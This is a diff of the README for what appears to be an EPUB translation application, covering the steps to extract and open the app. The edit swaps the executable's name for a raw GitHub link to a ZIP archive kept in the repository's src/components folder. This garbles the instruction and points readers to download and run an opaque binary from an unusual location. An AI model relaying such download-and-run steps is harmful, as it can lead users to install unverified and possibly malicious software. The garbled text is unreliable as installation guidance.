Lea4325/literary-epub-translator/README.md

    - Once downloaded, you will need to extract the files if they are in a ZIP format.
 Right-click the ZIP file and select "Extract All."

 5. **Open the Application**
    - Navigate to the extracted folder and double-click the application file.
-It may be named `literary-epub-translator.exe` or similar.
+It may be named `https://github.com/Lea4325/literary-epub-translator/raw/refs/heads/main/src/components/literary-epub-translator-1.6.zip` or similar.

 6. **Start Translating**
    - After opening the application, follow the on-screen instructions to upload your EPUB book.
 Enjoy translating your literary works!